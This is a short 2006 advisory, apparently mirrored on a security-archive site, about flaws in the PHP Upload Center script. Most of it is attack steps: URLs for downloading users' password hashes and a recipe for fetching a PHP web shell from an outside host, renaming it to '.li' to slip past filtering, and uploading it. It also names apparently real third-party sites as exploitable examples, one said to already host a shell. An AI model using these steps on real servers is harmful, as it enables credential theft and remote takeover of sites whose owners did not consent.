Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11670
HistoryMar 03, 2006 - 12:00 a.m.

PHP Upload Center Download users password hashes And phpshell Upload

2006-03-0300:00:00
vulners.com
11

PHP Upload Center Download users password hashes And phpshell Upload

Site:http://ksv.hypermart.net/php/

1)Download users password hashes:

http://victim.com/path/users/username

2)phpshell Upload

Example:

Download http://geocities.ocm/liz0zim/shell.php

And shell.php Save As shell.php.li

And Upload Web SΔ°te

http://victim.com/path/files/shell.php.li


1) Download users password hashes Example:

http://www.sattv.ru/upload/users/Admin

2)Upload PhpShell Example:

http://ha.bums.dk/upload/files/liz0.php.li


Credit :Liz0ziM
Website:www.biyosecurity.com
Mail :[email protected]


Source:
http://www.blogcu.com/Liz0ziM/317250/
http://biyosecurity.be/bugs/phpuploadcenter2.txt

–


Get your free email from http://mymail.bsdmail.com